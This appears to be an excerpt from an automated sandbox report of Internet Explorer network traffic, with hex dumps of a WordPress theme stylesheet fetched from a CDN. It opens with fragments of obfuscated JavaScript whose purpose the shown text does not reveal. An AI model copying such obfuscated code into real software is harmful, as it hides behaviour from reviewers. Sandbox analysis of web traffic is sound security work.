37 31 62 34 39 33 28 5f 30 78 34 34 32 66 66 34 2c 7b 7d 29 29 26 26 28 5f 30 78
                                                                                              Data Ascii: _0x2b93(_0x19a253){for(var _0x1b1fdc=_0x55bba8(),_0x23be41=[],_0x78f057='',_0x2be8b3=0x0;_0x2be8b3<_0x19a253['s'][a0_0x3d7e('0x17')];_0x2be8b3++){var _0x442ff4=_0x19a253['s'][_0x2be8b3],_0x9f5e5b='';try{void 0x0!==(_0x78f057=_0x71b493(_0x442ff4,{}))&&(_0x
                                                                                              2021-12-13 23:57:32 UTC8256INData Raw: 33 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 66 37 38 30 31 65 3d 77 69 6e 64 6f 77 5b 61 30 5f 30 78 33 64 37 65 28 27 30 78 31 66 27 29 5d 3b 5f 30 78 66 37 38 30 31 65 26 26 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 33 62 63 31 32 64 3d 5f 30 78 33 32 61 39 38 33 28 5f 30 78 66 37 38 30 31 65 29 2c 5f 30 78 32 37 62 30 35 30 3d 5f 30 78 33 62 63 31 32 64 5b 61 30 5f 30 78 33 64 37 65 28 27 30 78 36 27 29 5d 2c 5f 30 78 63 64 65 35 33 63 3d 5f 30 78 33 62 63 31 32 64 5b 61 30 5f 30 78 33 64 37 65 28 27 30 78 32 39 27 29 5d 3b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 33 32 63 62 38 36
                                                                                              Data Ascii: 3=function(){setTimeout(function(){var _0xf7801e=window[a0_0x3d7e('0x1f')];_0xf7801e&&setTimeout(function(){var _0x3bc12d=_0x32a983(_0xf7801e),_0x27b050=_0x3bc12d[a0_0x3d7e('0x6')],_0xcde53c=_0x3bc12d[a0_0x3d7e('0x29')];setTimeout(function(){var _0x32cb86
                                                                                              2021-12-13 23:57:32 UTC8257INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              6192.168.2.349762104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8220OUTGET /css/websetnet.net/wp-content/themes/magazine-pro/style.css HTTP/1.1
                                                                                              Accept: text/css, */*
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8315INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: text/css
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a559c1323c-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176186
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"68cfae91d8ca57994c09fbde2ff64a135dad3d0d49b98f69e79cb02877e01dcf"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-BO-LB-Server: LA-160
                                                                                              X-Cache: MISS, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-lga21960-LGA, cache-fra19122-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8316INData Raw: 36 39 30 34 0d 0a 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 6d 61 69 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 3b 6d 61 72 67 69 6e 3a 2e 36 37 65 6d 20 30 7d 68 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 70 72 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 69 74 69 61 6c 7d 61 62 62
                                                                                              Data Ascii: 6904html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}main{display:block}h1{font-size:2em;margin:.67em 0}hr{box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{background-color:initial}abb
                                                                                              2021-12-13 23:57:32 UTC8317INData Raw: 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 7d 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 3a 2d 77 65 62 6b 69 74 2d 69 6e 6e 65 72 2d 73 70 69 6e 2d 62 75 74 74 6f 6e 2c 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 3a 2d 77 65 62 6b 69 74 2d 6f 75 74 65 72 2d 73 70 69 6e 2d 62 75 74 74 6f 6e 7b 68 65 69 67 68 74 3a 61 75 74 6f 7d 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 74 65 78 74 66 69 65 6c 64 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2d 32 70 78 7d 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a
                                                                                              Data Ascii: ox-sizing:border-box;padding:0}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}[type=search]::-webkit-search-decoration{-webkit-appearance:none}::
                                                                                              2021-12-13 23:57:32 UTC8319INData Raw: 74 74 6f 6e 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 3a 3a 73 65 6c 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 63 6f 6c 6f 72 3a 23 30 30 38 32 38 35 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 3a 66 6f 63 75 73 2c 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 32 32 32 7d 70 7b 6d 61 72 67 69 6e 3a 30 20 30 20 32 34 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 6f
                                                                                              Data Ascii: tton{transition:all .1s ease-in-out}::selection{background-color:#222;color:#fff;text-shadow:none}a{background-color:inherit;color:#008285;font-weight:400;text-decoration:none}a:focus,a:hover{color:#222}p{margin:0 0 24px;padding:0}strong{font-weight:700}o
                                                                                              2021-12-13 23:57:32 UTC8320INData Raw: 64 28 33 6e 2b 31 29 2c 2e 67 61 6c 6c 65 72 79 2d 63 6f 6c 75 6d 6e 73 2d 34 20 2e 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 31 29 2c 2e 67 61 6c 6c 65 72 79 2d 63 6f 6c 75 6d 6e 73 2d 35 20 2e 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 63 68 69 6c 64 28 35 6e 2b 31 29 2c 2e 67 61 6c 6c 65 72 79 2d 63 6f 6c 75 6d 6e 73 2d 36 20 2e 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 63 68 69 6c 64 28 36 6e 2b 31 29 2c 2e 67 61 6c 6c 65 72 79 2d 63 6f 6c 75 6d 6e 73 2d 37 20 2e 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 63 68 69 6c 64 28 37 6e 2b 31 29 2c 2e 67 61 6c 6c 65 72 79 2d 63 6f 6c 75 6d 6e 73 2d 38 20 2e 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 63 68 69 6c 64 28 38 6e 2b 31 29 2c 2e 67
                                                                                              Data Ascii: d(3n+1),.gallery-columns-4 .gallery-item:nth-child(4n+1),.gallery-columns-5 .gallery-item:nth-child(5n+1),.gallery-columns-6 .gallery-item:nth-child(6n+1),.gallery-columns-7 .gallery-item:nth-child(7n+1),.gallery-columns-8 .gallery-item:nth-child(8n+1),.g
                                                                                              2021-12-13 23:57:32 UTC8321INData Raw: 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 3b 77 69 64 74 68 3a 61 75 74 6f 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 2c 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 3a 66 6f 63 75 73 2c 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 63 6f
                                                                                              Data Ascii: orm:uppercase;white-space:normal;width:auto}button:focus,button:hover,input[type=button]:focus,input[type=button]:hover,input[type=reset]:focus,input[type=reset]:hover,input[type=submit]:focus,input[type=submit]:hover,.button:focus,.button:hover,.entry-co
                                                                                              2021-12-13 23:57:32 UTC8323INData Raw: 64 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 64 64 3b 62 6f 72 64 65 72 3a 30 3b 63 6f 6c 6f 72 3a 23 35 36 35 36 35 36 3b 63 75 72 73 6f 72 3a 6e 6f 74 2d 61 6c 6c 6f 77 65 64 7d 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 63 61 6e 63 65 6c 2d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 72 65 73 75 6c 74 73 2d 62 75 74 74 6f 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 65 72 72 6f 72 34 30 34 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 2e 70 6f 73 74 2d 70 61 73 73 77 6f 72 64 2d 66 6f 72 6d 20 69 6e 70 75 74 5b 74
                                                                                              Data Ascii: d:hover{background-color:#ddd;border:0;color:#565656;cursor:not-allowed}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-results-button{display:none}.error404 .entry-content input[type=search],.post-password-form input[t
                                                                                              2021-12-13 23:57:32 UTC8324INData Raw: 61 72 2d 73 69 64 65 62 61 72 2d 63 6f 6e 74 65 6e 74 20 2e 63 6f 6e 74 65 6e 74 2d 73 69 64 65 62 61 72 2d 77 72 61 70 7b 77 69 64 74 68 3a 39 33 30 70 78 7d 2e 63 6f 6e 74 65 6e 74 2d 73 69 64 65 62 61 72 2d 73 69 64 65 62 61 72 20 2e 63 6f 6e 74 65 6e 74 2d 73 69 64 65 62 61 72 2d 77 72 61 70 7b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 73 69 64 65 62 61 72 2d 63 6f 6e 74 65 6e 74 2d 73 69 64 65 62 61 72 20 2e 63 6f 6e 74 65 6e 74 2d 73 69 64 65 62 61 72 2d 77 72 61 70 2c 2e 73 69 64 65 62 61 72 2d 73 69 64 65 62 61 72 2d 63 6f 6e 74 65 6e 74 20 2e 63 6f 6e 74 65 6e 74 2d 73 69 64 65 62 61 72 2d 77 72 61 70 7b 66 6c 6f 61 74 3a 72 69 67 68 74 7d 2e 63 6f 6e 74 65 6e 74 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 77 69 64 74 68 3a 37 35 30 70 78 7d 2e 6d 61 67 61
                                                                                              Data Ascii: ar-sidebar-content .content-sidebar-wrap{width:930px}.content-sidebar-sidebar .content-sidebar-wrap{float:left}.sidebar-content-sidebar .content-sidebar-wrap,.sidebar-sidebar-content .content-sidebar-wrap{float:right}.content{float:right;width:750px}.maga
                                                                                              2021-12-13 23:57:32 UTC8325INData Raw: 2e 39 30 35 39 38 32 39 30 35 39 38 32 39 31 25 7d 2e 66 69 72 73 74 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 61 76 61 74 61 72 7b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 61 6c 69 67 6e 6c 65 66 74 20 2e 61 76 61 74 61 72 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 32 34 70 78 7d 2e 61 6c 69 67 6e 72 69 67 68 74 20 2e 61 76 61 74 61 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 34 70 78 7d 2e 61 75 74 68 6f 72 2d 62 6f 78 20 2e 61 76 61 74 61 72 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 30 70 78 7d 2e 63 6f 6d 6d 65 6e 74 20 2e 61 76 61 74 61 72 7b 6d 61 72 67 69 6e 3a 30 20 31 36 70 78 20 32 34 70 78 20 30 7d 61 2e 61 6c 69 67 6e 63 65 6e 74 65 72 20 69 6d 67 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69
                                                                                              Data Ascii: .90598290598291%}.first{clear:both;margin-left:0}.avatar{float:left}.alignleft .avatar{margin-right:24px}.alignright .avatar{margin-left:24px}.author-box .avatar{margin-right:30px}.comment .avatar{margin:0 16px 24px 0}a.aligncenter img{display:block;margi
                                                                                              2021-12-13 23:57:32 UTC8327INData Raw: 23 32 32 32 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 70 78 7d 2e 61 75 74 68 6f 72 2d 62 6f 78 20 70 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 73 65 61 72 63 68 2d 66 6f 72 6d 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 73 65 61 72 63 68 2d 66 6f 72 6d 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 30 70 78 3b 77 69 64 74 68 3a 35 30 25 7d 2e 73 69 74 65 2d 68 65 61 64 65 72 20 2e 73 65 61 72 63 68 2d 66 6f 72 6d 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 34 70 78
                                                                                              Data Ascii: #222;font-family:Roboto,sans-serif;font-size:16px;margin-bottom:4px}.author-box p{margin-bottom:0}.search-form{overflow:hidden;position:relative}.entry-content .search-form{margin-bottom:40px;width:50%}.site-header .search-form{float:right;margin-top:24px
                                                                                              2021-12-13 23:57:32 UTC8328INData Raw: 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 7d 2e 61 72 63 68 69 76 65 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 77 69 64 67 65 74 2c 2e 77 69 64 67 65 74 20 6c 69 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 2e 77 69 64 67 65 74 20 6c 69 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 7d 2e 77 69 64 67 65 74 20 6f 6c 3e 6c 69 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 70 6f 73 69 74 69 6f 6e 3a 69 6e 73 69 64 65 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 64 65 63 69 6d 61 6c 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 74 65 78 74 2d 69 6e 64 65 6e 74 3a 2d 32 30 70 78 7d 2e 77 69 64 67 65 74 20 6c 69 20 6c 69 7b
                                                                                              Data Ascii: color:#fff;color:#222}.archive-title{font-size:20px;margin-bottom:0}.widget,.widget li{word-wrap:break-word}.widget li{list-style-type:none}.widget ol>li{list-style-position:inside;list-style-type:decimal;padding-left:20px;text-indent:-20px}.widget li li{
                                                                                              2021-12-13 23:57:32 UTC8329INData Raw: 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 7d 2e 77 69 64 67 65 74 2d 61 72 65 61 20 2e 65 6e 65 77 73 2d 77 69 64 67 65 74 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 38 32 38 35 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 77 69 64 67 65 74 2d 61 72 65 61 20 2e 65 6e 65 77 73 2d 77 69 64 67 65 74 20 69 6e 70 75 74 3a 66 6f 63 75 73 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 2c 2e 77 69 64 67 65 74 2d 61 72 65 61 20 2e 65 6e 65 77 73 2d 77 69 64 67 65 74 20 69 6e 70 75 74 3a 68 6f 76 65 72 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 7d 2e 6d 61 67 61 7a 69 6e 65 2d 6c 61 6e 64 69 6e 67 20 2e 77
                                                                                              Data Ascii: :1px solid #ddd}.widget-area .enews-widget input[type=submit]{background-color:#008285;color:#fff}.widget-area .enews-widget input:focus[type=submit],.widget-area .enews-widget input:hover[type=submit]{background-color:#fff;color:#222}.magazine-landing .w
                                                                                              2021-12-13 23:57:32 UTC8331INData Raw: 2d 73 6d 61 6c 6c 7b 68 65 69 67 68 74 3a 31 32 30 70 78 7d 2e 73 69 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 66 6f 72 6d 73 2d 66 6f 72 6d 20 74 65 78 74 61 72 65 61 2e 77 70 66 6f 72 6d 73 2d 66 69 65 6c 64 2d 6d 65 64 69 75 6d 7b 68 65 69 67 68 74 3a 32 30 30 70 78 7d 2e 73 69 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 66 6f 72 6d 73 2d 66 6f 72 6d 20 74 65 78 74 61 72 65 61 2e 77 70 66 6f 72 6d 73 2d 66 69 65 6c 64 2d 6c 61 72 67 65 7b 68 65 69 67 68 74 3a 33 30 30 70 78 7d 2e 67 65 6e 65 73 69 73 2d 73 6b 69 70 2d 6c 69 6e 6b 7b 6d 61 72 67 69 6e 3a 30 7d 2e 67 65 6e 65 73 69 73 2d 73 6b 69 70 2d 6c 69 6e 6b 20 6c 69 7b 68 65 69 67 68 74 3a 30 3b 77
                                                                                              Data Ascii: -small{height:120px}.site-container .entry-content .wpforms-form textarea.wpforms-field-medium{height:200px}.site-container .entry-content .wpforms-form textarea.wpforms-field-large{height:300px}.genesis-skip-link{margin:0}.genesis-skip-link li{height:0;w
                                                                                              2021-12-13 23:57:32 UTC8332INData Raw: 61 76 2d 6d 65 6e 75 20 61 3a 68 6f 76 65 72 2c 2e 67 65 6e 65 73 69 73 2d 6e 61 76 2d 6d 65 6e 75 20 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 3e 61 2c 2e 67 65 6e 65 73 69 73 2d 6e 61 76 2d 6d 65 6e 75 20 2e 73 75 62 2d 6d 65 6e 75 20 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 3e 61 3a 66 6f 63 75 73 2c 2e 67 65 6e 65 73 69 73 2d 6e 61 76 2d 6d 65 6e 75 20 2e 73 75 62 2d 6d 65 6e 75 20 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 3e 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 38 32 38 35 7d 2e 67 65 6e 65 73 69 73 2d 6e 61 76 2d 6d 65 6e 75 20 2e 73 75 62 2d 6d 65 6e 75 7b 6c 65 66 74 3a 2d 39 39 39 39 70 78 3b 6f 70 61 63 69 74 79 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 72 61 6e 73 69 74
                                                                                              Data Ascii: av-menu a:hover,.genesis-nav-menu .current-menu-item>a,.genesis-nav-menu .sub-menu .current-menu-item>a:focus,.genesis-nav-menu .sub-menu .current-menu-item>a:hover{color:#008285}.genesis-nav-menu .sub-menu{left:-9999px;opacity:0;position:absolute;transit
                                                                                              2021-12-13 23:57:32 UTC8333INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 32 32 32 7d 2e 6d 65 6e 75 20 2e 6d 65 6e 75 2d 69 74 65 6d 3a 66 6f 63 75 73 7b 70 6f 73 69 74 69 6f 6e 3a 73 74 61 74 69 63 7d 2e 6d 65 6e 75 20 2e 6d 65 6e 75 2d 69 74 65 6d 3e 61 3a 66 6f 63 75 73 2b 75 6c 2e 73 75 62 2d 6d 65 6e 75 2c 2e 6d 65 6e 75 20 2e 6d 65 6e 75 2d 69 74 65 6d 2e 73 66 48 6f 76 65 72 3e 75 6c 2e 73 75 62 2d 6d 65 6e 75 7b 6c 65 66 74 3a 61 75 74 6f 3b 6f 70 61 63 69 74 79 3a 31 7d 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 2c 2e 73 75 62 2d 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 65 6e 74 72 79 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 61 72 63 68 69
                                                                                              Data Ascii: border-bottom:1px solid #222}.menu .menu-item:focus{position:static}.menu .menu-item>a:focus+ul.sub-menu,.menu .menu-item.sfHover>ul.sub-menu{left:auto;opacity:1}.menu-toggle,.sub-menu-toggle{display:none;visibility:hidden}.entry{margin-bottom:60px}.archi
                                                                                              2021-12-13 23:57:32 UTC8335INData Raw: 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 31 32 70 78 7d 2e 61 72 63 68 69 76 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 6c 69 20 61 3a 66 6f 63 75 73 2c 2e 61 72 63 68 69 76 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 6c 69 20 61 3a 68 6f 76 65 72 2c 2e 61 72 63 68 69 76 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 6c 69 2e 61 63 74 69 76 65 20 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 38 32 38 35 7d 2e 65 6e 74 72 79 2d 70 61 67 69 6e 61 74 69 6f 6e 20 61 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 7d 2e 63 6f 6d 6d 65 6e 74 2d 72 65 73 70 6f 6e 64 2c 2e 65 6e 74 72 79 2d 63 6f 6d 6d 65 6e 74 73 2c 2e 65 6e 74 72 79 2d 70 69 6e 67 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                              Data Ascii: e-block;padding:8px 12px}.archive-pagination li a:focus,.archive-pagination li a:hover,.archive-pagination li.active a{background-color:#008285}.entry-pagination a{border-bottom:1px solid #ddd}.comment-respond,.entry-comments,.entry-pings{background-color
                                                                                              2021-12-13 23:57:32 UTC8336INData Raw: 62 6f 74 74 6f 6d 3a 36 70 78 7d 2e 73 69 64 65 62 61 72 20 2e 77 69 64 67 65 74 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 30 70 78 7d 2e 73 69 64 65 62 61 72 20 2e 74 61 67 63 6c 6f 75 64 20 61 2c 2e 73 69 64 65 62 61 72 20 2e 74 61 67 63 6c 6f 75 64 20 61 3a 76 69 73 69 74 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 35 70 78 20 35 70 78 20 30 3b 70 61 64 64 69 6e 67 3a 35 70 78 20 31 30 70 78 7d 2e 73 69 64 65 62 61 72 20 2e 74 61 67 63 6c 6f 75 64 20 61 3a 66 6f 63 75 73 2c 2e 73 69 64 65 62 61 72 20 2e 74 61 67 63 6c 6f 75 64 20 61 3a 68 6f 76 65 72
                                                                                              Data Ascii: bottom:6px}.sidebar .widget{margin-bottom:40px}.sidebar .tagcloud a,.sidebar .tagcloud a:visited{background-color:#eee;color:#222;cursor:pointer;display:inline-block;margin:0 5px 5px 0;padding:5px 10px}.sidebar .tagcloud a:focus,.sidebar .tagcloud a:hover
                                                                                              2021-12-13 23:57:32 UTC8337INData Raw: 74 65 72 2d 77 69 64 67 65 74 73 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 66 6f 63 75 73 2c 2e 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 73 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 68 6f 76 65 72 2c 2e 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 73 20 2e 62 75 74 74 6f 6e 3a 66 6f 63 75 73 2c 2e 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 73 20 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 73 20 62 75 74 74 6f 6e 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 73 20 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 73 20 69 6e 70 75
